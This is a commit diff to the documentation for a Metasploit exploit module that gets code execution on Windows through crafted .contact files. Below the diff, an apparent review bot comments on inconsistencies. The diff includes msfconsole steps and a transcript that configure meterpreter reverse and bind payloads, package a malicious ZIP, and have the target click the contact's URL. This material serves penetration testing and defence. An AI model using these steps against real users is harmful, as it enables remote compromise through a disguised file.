Update documentation to detail the verification steps and describe the module options

master
asoto-r7 2019-04-10 16:50:01 -05:00
parent 58be84b3b8
commit 7bccdf2d0f
GPG Key ID: F531810B7FE55396
1 changed files with 52 additions and 16 deletions


@ -1,30 +1,66 @@
## Description
This module allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
The "." chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
12345678901234567890123456789012345678901234567890123456789012345678901234567890
This module allows remote attackers to execute arbitrary code on vulnerable
installations of Microsoft Windows. User interaction is required to exploit
this vulnerability in that the target must visit a malicious page or open a
malicious file. The flaw is due to the processing of ".contact" files <c:Url>
node param which takes an expected website value, however if an attacker
references an executable file it will run that instead without warning instead
of performing expected web navigation. This is dangerous and would be
unexpected to an end user.
Executable files can live in a sub-directory so when the ".contact" website link
is clicked it traverses directories towards the executable and runs. Making
matters worse is if the the files are compressed then downloaded "mark of the
web" (MOTW) may potentially not work as expected with certain archive utilitys.
The "." chars allow directory traversal to occur in order to run the attackers
supplied executable sitting unseen in the attackers directory. This advisory is
a duplicate issue that currently affects Windows .VCF files, and released for
the sake of completeness as it affects Windows .contact files as well.
## Vulnerable Application
Windows
Windows Contacts
(tested on Windows 10.0.18282)
## Verification Steps
1. `./msfconsole`
2. `use exploit/windows/fileformat/`
3. `set lport <lport>`
4. `set lhost <lhost>`
5. `exploit`
2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
5. Set the output internal file: `set FILENAME msf.com`
6. Set the name of the contact: `set FULL_NAME John Smith`
7. Set the output of the ZIP to be delivered to the target: `set ZIP John Smith.zip`
8. `run`
## Scenarios
### microsoft_windows_contact_remote_code_execution Tested on Windows 10.0.18282
### Exploiting a Windows 10 host
1. Configure the module-specific settings.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > exploit
[*] Creating 'John Smith.zip'
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME metasploit.com
FILENAME => metasploit.com
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FULL_NAME David Davidson
FULL_NAME => David Davidson
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set ZIP David Davidson.zip
ZIP => David Davidson.zip
```
2. Configure the payload.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.199.148
LHOST => 192.168.199.148
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run
[*] Creating 'David Davidson.zip'
```
3. Send the ZIP to the target machine.
4. On the target machine, extract the ZIP file, open the .CONTACT file in the Windows Contacts viewer, and click the URL in the "Website" field.
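Review bot: the Verification Steps are internally inconsistent: step 3 suggests `set PAYLOAD windows/x64/meterpreter/bind_tcp` while step 4 then sets `LHOST 192.168.1.1`, but a bind payload does not use LHOST (the Scenarios section below correctly pairs LHOST with `windows/x64/meterpreter/reverse_tcp`); either switch the step 3 example to `reverse_tcp` or show `RHOST` for the bind case. Two smaller items in the same hunk: the `12345678901234567890...` line under the description reads as a leftover 80-column ruler from rewrapping the paragraph and should be removed before merge, and the description still carries "the the files" and "archive utilitys" (utilities). In the Scenarios transcript, the first `exploit` command runs before `FILENAME`, `FULL_NAME` and `ZIP` are set, so the first `[*] Creating 'John Smith.zip'` output only shows default values and is confusing next to the later `David Davidson.zip` run; drop that first invocation or move it after the `set` lines. Finally, step 5's wording "Set the output internal file" is unclear; consider "Set the name of the executable placed inside the ZIP (the name the `<c:Url>` node points at)", which also ties the option back to the `.contact` URL-node behaviour and the MOTW caveat the description explains.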